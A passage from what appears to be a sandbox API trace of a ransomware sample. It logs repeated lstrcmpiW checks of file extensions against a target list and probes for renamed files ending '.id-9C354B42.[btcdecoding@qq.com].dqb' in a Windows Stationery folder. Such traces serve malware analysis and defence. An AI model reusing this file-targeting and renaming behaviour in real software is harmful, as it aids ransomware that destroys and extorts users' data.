Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.506] lstrlenW (lpString=".doc") returned 4 [0042.506] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.506] lstrlenW (lpString=".docx") returned 5 [0042.506] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.506] lstrlenW (lpString=".pdf") returned 4 [0042.506] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.506] lstrlenW (lpString=".xls") returned 4 [0042.506] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.506] lstrlenW (lpString=".xlsx") returned 5 [0042.506] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.506] lstrlenW (lpString=".ppt") returned 4 [0042.506] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.506] lstrlenW (lpString=".zip") returned 4 [0042.506] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.506] lstrlenW (lpString=".rar") returned 4 [0042.506] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.506] lstrlenW (lpString=".bz2") returned 4 [0042.506] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.506] lstrlenW (lpString=".7z") returned 3 [0042.507] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".dbf") returned 4 [0042.507] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".1cd") returned 4 [0042.507] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".jpg") returned 4 [0042.507] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".doc") returned 4 [0042.507] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.507] lstrlenW (lpString=".docx") returned 5 [0042.507] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.507] lstrlenW (lpString=".pdf") returned 4 [0042.507] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString=".xls") returned 4 [0042.507] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString=".xlsx") returned 5 [0042.507] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.507] lstrlenW (lpString=".ppt") returned 4 [0042.507] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".zip") returned 4 [0042.507] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString=".rar") returned 4 [0042.507] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.507] lstrlenW (lpString=".bz2") returned 4 [0042.507] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.507] lstrlenW (lpString=".7z") returned 3 [0042.507] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.507] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.507] lstrlenW (lpString=".dbf") returned 4 [0042.508] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.508] lstrlenW (lpString=".1cd") returned 4 [0042.508] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75 [0042.508] lstrlenW (lpString=".jpg") returned 4 [0042.508] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.508] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0042.508] lstrlenW (lpString="Monet.jpg") returned 9 [0042.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.508] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2209) returned 1 [0042.508] CloseHandle (hObject=0x174) returned 1 [0042.508] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0x20 [0042.508] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.508] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.508] lstrlenW (lpString=".doc") returned 4 [0042.508] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.509] lstrlenW (lpString=".docx") returned 5 [0042.509] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.509] lstrlenW (lpString=".pdf") returned 4 [0042.509] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.509] lstrlenW (lpString=".xls") returned 4 [0042.509] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.509] lstrlenW (lpString=".xlsx") returned 5 [0042.509] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.509] lstrlenW (lpString=".ppt") returned 4 [0042.509] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString=".zip") returned 4 [0042.509] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.509] lstrlenW (lpString=".rar") returned 4 [0042.509] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.509] lstrlenW (lpString=".bz2") returned 4 [0042.509] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.509] lstrlenW (lpString=".7z") returned 3 [0042.509] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString=".dbf") returned 4 [0042.509] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString=".1cd") returned 4 [0042.509] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString=".jpg") returned 4 [0042.509] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.509] lstrlenW (lpString=".doc") returned 4 [0042.509] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.509] lstrlenW (lpString=".docx") returned 5 [0042.509] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.509] lstrlenW (lpString=".pdf") returned 4 [0042.510] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.510] lstrlenW (lpString=".xls") returned 4 [0042.510] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.510] lstrlenW (lpString=".xlsx") returned 5 [0042.510] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.510] lstrlenW (lpString=".ppt") returned 4 [0042.510] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.510] lstrlenW (lpString=".zip") returned 4 [0042.510] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.510] lstrlenW (lpString=".rar") returned 4 [0042.510] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.510] lstrlenW (lpString=".bz2") returned 4 [0042.510] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.510] lstrlenW (lpString=".7z") returned 3 [0042.510] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.510] lstrlenW (lpString=".dbf") returned 4 [0042.510] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.510] lstrlenW (lpString=".1cd") returned 4 [0042.510] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 67 [0042.510] lstrlenW (lpString=".jpg") returned 4 [0042.510] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.510] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0042.510] lstrlenW (lpString="Month_Calendar.emf") returned 18 [0042.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.511] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=4192) returned 1 [0042.511] CloseHandle (hObject=0x174) returned 1 [0042.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0x20 [0042.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.511] lstrlenW (lpString=".doc") returned 4 [0042.511] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.511] lstrlenW (lpString=".docx") returned 5 [0042.511] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1 [0042.511] lstrlenW (lpString=".pdf") returned 4 [0042.511] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.511] lstrlenW (lpString=".xls") returned 4 [0042.511] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.511] lstrlenW (lpString=".xlsx") returned 5 [0042.511] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1 [0042.511] lstrlenW (lpString=".ppt") returned 4 [0042.511] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.511] lstrlenW (lpString=".zip") returned 4 [0042.511] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.511] lstrlenW (lpString=".rar") returned 4 [0042.511] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.511] lstrlenW (lpString=".bz2") returned 4 [0042.511] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.511] lstrlenW (lpString=".7z") returned 3 [0042.511] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".dbf") returned 4 [0042.512] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".1cd") returned 4 [0042.512] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".jpg") returned 4 [0042.512] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".doc") returned 4 [0042.512] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.512] lstrlenW (lpString=".docx") returned 5 [0042.512] lstrcmpiW (lpString1=".docx", lpString2="r.emf") returned -1 [0042.512] lstrlenW (lpString=".pdf") returned 4 [0042.512] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString=".xls") returned 4 [0042.512] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString=".xlsx") returned 5 [0042.512] lstrcmpiW (lpString1=".xlsx", lpString2="r.emf") returned -1 [0042.512] lstrlenW (lpString=".ppt") returned 4 [0042.512] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".zip") returned 4 [0042.512] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString=".rar") returned 4 [0042.512] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.512] lstrlenW (lpString=".bz2") returned 4 [0042.512] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.512] lstrlenW (lpString=".7z") returned 3 [0042.512] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.512] lstrlenW (lpString=".dbf") returned 4 [0042.513] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.513] lstrlenW (lpString=".1cd") returned 4 [0042.513] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 76 [0042.513] lstrlenW (lpString=".jpg") returned 4 [0042.513] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.513] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0042.513] lstrlenW (lpString="Music.emf") returned 9 [0042.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.514] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=26036) returned 1 [0042.514] CloseHandle (hObject=0x174) returned 1 [0042.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0x20 [0042.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.514] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.514] lstrlenW (lpString=".doc") returned 4 [0042.514] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.514] lstrlenW (lpString=".docx") returned 5 [0042.514] lstrcmpiW (lpString1=".docx", lpString2="c.emf") returned -1 [0042.514] lstrlenW (lpString=".pdf") returned 4 [0042.514] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.514] lstrlenW (lpString=".xls") returned 4 [0042.514] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.514] lstrlenW (lpString=".xlsx") returned 5 [0042.514] lstrcmpiW (lpString1=".xlsx", lpString2="c.emf") returned -1 [0042.514] lstrlenW (lpString=".ppt") returned 4 [0042.514] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.514] lstrlenW (lpString=".zip") returned 4 [0042.514] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.514] lstrlenW (lpString=".rar") returned 4 [0042.514] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.514] lstrlenW (lpString=".bz2") returned 4 [0042.514] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.514] lstrlenW (lpString=".7z") returned 3 [0042.515] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".dbf") returned 4 [0042.515] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".1cd") returned 4 [0042.515] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".jpg") returned 4 [0042.515] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".doc") returned 4 [0042.515] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.515] lstrlenW (lpString=".docx") returned 5 [0042.515] lstrcmpiW (lpString1=".docx", lpString2="c.emf") returned -1 [0042.515] lstrlenW (lpString=".pdf") returned 4 [0042.515] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString=".xls") returned 4 [0042.515] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString=".xlsx") returned 5 [0042.515] lstrcmpiW (lpString1=".xlsx", lpString2="c.emf") returned -1 [0042.515] lstrlenW (lpString=".ppt") returned 4 [0042.515] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".zip") returned 4 [0042.515] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString=".rar") returned 4 [0042.515] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.515] lstrlenW (lpString=".bz2") returned 4 [0042.515] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.515] lstrlenW (lpString=".7z") returned 3 [0042.515] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.515] lstrlenW (lpString=".dbf") returned 4 [0042.516] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.516] lstrlenW (lpString=".1cd") returned 4 [0042.516] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 67 [0042.516] lstrlenW (lpString=".jpg") returned 4 [0042.516] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.516] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0042.516] lstrlenW (lpString="Notebook.jpg") returned 12 [0042.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.517] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2950) returned 1 [0042.517] CloseHandle (hObject=0x174) returned 1 [0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0x20 [0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.517] lstrlenW (lpString=".doc") returned 4 [0042.517] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.517] lstrlenW (lpString=".docx") returned 5 [0042.517] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.517] lstrlenW (lpString=".pdf") returned 4 [0042.517] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.517] lstrlenW (lpString=".xls") returned 4 [0042.517] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.517] lstrlenW (lpString=".xlsx") returned 5 [0042.517] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.517] lstrlenW (lpString=".ppt") returned 4 [0042.517] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.517] lstrlenW (lpString=".zip") returned 4 [0042.517] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.517] lstrlenW (lpString=".rar") returned 4 [0042.517] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.518] lstrlenW (lpString=".bz2") returned 4 [0042.518] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.518] lstrlenW (lpString=".7z") returned 3 [0042.518] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString=".dbf") returned 4 [0042.518] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString=".1cd") returned 4 [0042.518] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString=".jpg") returned 4 [0042.518] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString=".doc") returned 4 [0042.518] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.518] lstrlenW (lpString=".docx") returned 5 [0042.518] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0042.518] lstrlenW (lpString=".pdf") returned 4 [0042.518] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.518] lstrlenW (lpString=".xls") returned 4 [0042.518] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.518] lstrlenW (lpString=".xlsx") returned 5 [0042.518] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0042.518] lstrlenW (lpString=".ppt") returned 4 [0042.518] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.518] lstrlenW (lpString=".zip") returned 4 [0042.518] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.518] lstrlenW (lpString=".rar") returned 4 [0042.518] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.518] lstrlenW 